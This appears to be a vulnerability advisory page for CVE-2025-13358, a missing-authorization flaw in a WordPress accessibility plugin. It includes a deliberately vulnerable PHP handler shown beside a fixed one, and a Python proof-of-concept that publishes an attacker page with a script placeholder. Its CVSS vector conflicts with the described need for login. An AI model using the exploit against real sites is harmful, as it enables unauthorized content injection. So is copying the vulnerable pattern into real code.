Security Vulnerability Report
CVE-2025-13358 CVSS 5.3 MEDIUM

Published: 2025-12-06 06:15:52
Last Modified: 2026-04-15 00:35:42

Description

The Accessiy By CodeConfig Accessibility plugin for WordPress is vulnerable to unauthorized page creation due to missing authorization checks in versions up to, and including, 1.0.0. This is due to the plugin not performing capability checks in the `Settings::createPage()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary published pages on the site via the `ccpcaCreatePage` AJAX action.
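The weakness class here is CWE-862 (missing authorization): a WordPress AJAX handler registered under `wp_ajax_*` is reachable by any logged-in user, so the handler itself has to enforce a capability check before it does privileged work. The following PHP is an added illustration of that pattern and its fix. It is not the plugin's code; the function, action and parameter names (`example_create_page_*`, `page_title`, `page_content`, the `nonce` field) are assumptions chosen for the example.

```php
<?php
// Added illustration of the CWE-862 pattern, not the plugin's own code.
// Assumed names: example_create_page_vulnerable / example_create_page_hardened,
// POST fields page_title, page_content, nonce.
// WordPress dispatches admin-ajax.php?action=<name> to the 'wp_ajax_<name>' hook
// for any authenticated user, Subscriber role included.

// --- Vulnerable pattern: no nonce, no capability check -----------------------
function example_create_page_vulnerable() {
    $title   = isset($_POST['page_title'])   ? sanitize_text_field(wp_unslash($_POST['page_title'])) : '';
    $content = isset($_POST['page_content']) ? wp_kses_post(wp_unslash($_POST['page_content']))      : '';

    // Every authenticated user reaches this line and publishes a page.
    $post_id = wp_insert_post(array(
        'post_type'    => 'page',
        'post_title'   => $title,
        'post_content' => $content,
        'post_status'  => 'publish',
    ), true);

    if (is_wp_error($post_id)) {
        wp_send_json_error($post_id->get_error_message());
    }
    wp_send_json_success(array('id' => $post_id));
}
add_action('wp_ajax_example_create_page_vulnerable', 'example_create_page_vulnerable');

// --- Hardened pattern ----------------------------------------------------------
function example_create_page_hardened() {
    // 1. CSRF protection: the request must carry a nonce minted for this action.
    //    check_ajax_referer() terminates the request with a 403 on failure.
    check_ajax_referer('example_create_page', 'nonce');

    // 2. Authorization (the check that CWE-862 describes as missing): only users
    //    holding the publish_pages capability continue. Subscribers do not.
    if (!current_user_can('publish_pages')) {
        wp_send_json_error('Insufficient permissions', 403);
    }

    // 3. Input validation and sanitization after the authorization decision.
    $title   = isset($_POST['page_title'])   ? sanitize_text_field(wp_unslash($_POST['page_title'])) : '';
    $content = isset($_POST['page_content']) ? wp_kses_post(wp_unslash($_POST['page_content']))      : '';

    if ($title === '') {
        wp_send_json_error('page_title is required', 400);
    }

    $post_id = wp_insert_post(array(
        'post_type'    => 'page',
        'post_title'   => $title,
        'post_content' => $content,
        'post_status'  => 'publish',
    ), true);

    if (is_wp_error($post_id)) {
        wp_send_json_error($post_id->get_error_message(), 500);
    }
    wp_send_json_success(array('id' => $post_id));
}
add_action('wp_ajax_example_create_page_hardened', 'example_create_page_hardened');
```

Two design points. The capability check must sit in the handler itself: `wp_insert_post()` performs no authorization, and WordPress core does not gate `wp_ajax_*` hooks beyond "is logged in". A nonce alone is not an authorization control, since any Subscriber can obtain one for an action exposed to them; the `current_user_can()` call is what closes the finding. For detection on an affected site, `wp-admin/admin-ajax.php` POSTs carrying `action=ccpcaCreatePage` from low-privilege accounts, and `page` posts whose `post_author` is a Subscriber, are the indicators to review.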

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Accessiy By CodeConfig Accessibility plugin <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13358 PoC - Unauthorized Page Creation via ccpcaCreatePage AJAX action
# Affected: Accessiy By CodeConfig Accessibility plugin <= 1.0.0
target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# WordPress AJAX endpoint
ajax_url = f'{target_url}/wp-admin/admin-ajax.php'

# Authentication credentials (any valid user account with Subscriber role or higher)
credentials = {
    'log': 'attacker_username',
    'pwd': 'attacker_password'
}

# Create session and authenticate
session = requests.Session()
login_url = f'{target_url}/wp-login.php'
resp = session.post(login_url, data=credentials)

# WordPress names the auth cookie wordpress_logged_in_<hash>, so match on the prefix
if not any(name.startswith('wordpress_logged_in') for name in session.cookies.get_dict()):
    print('[-] Authentication failed')
    sys.exit(1)
print('[+] Authentication successful')

# Exploit payload - create arbitrary page
# Action: ccpcaCreatePage
# Required parameters: page_title, page_content (plugin specific parameter names may vary)
exploit_data = {
    'action': 'ccpcaCreatePage',
    'page_title': 'Malicious Page Created by Attacker',
    'page_content': '<h1>Compromised Page</h1><script>malicious_code_here</script>',
    'page_status': 'publish'  # Published immediately without authorization
}

response = session.post(ajax_url, data=exploit_data)

if response.status_code == 200:
    print('[+] Exploit sent successfully')
    print(f'[+] Response: {response.text}')
    print('[!] Check WordPress pages for newly created malicious content')
else:
    print(f'[-] Exploit failed with status code: {response.status_code}')
```

References

Weakness: CWE-862 (Missing Authorization)

https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax.php#L24
https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax/Settings.php#L96
https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L24
https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L96
https://plugins.trac.wordpress.org/changeset/3411529/
https://www.wordfence.com/threat-intel/vulnerabilities/id/fe324d4d-eb52-4eeb-ad91-072a6e84d9ba?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13358", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:51.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Accessiy By CodeConfig Accessibility plugin for WordPress is vulnerable to unauthorized page creation due to missing authorization checks in versions up to, and including, 1.0.0. This is due to the plugin not performing capability checks in the `Settings::createPage()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary published pages on the site via the `ccpcaCreatePage` AJAX action."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/tags/1.0.0/includes/Ajax/Settings.php#L96", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/codeconfig-accessibility/trunk/includes/Ajax/Settings.php#L96", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3411529/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe324d4d-eb52-4eeb-ad91-072a6e84d9ba?source=cve", "source": "[email protected]"}]}}
```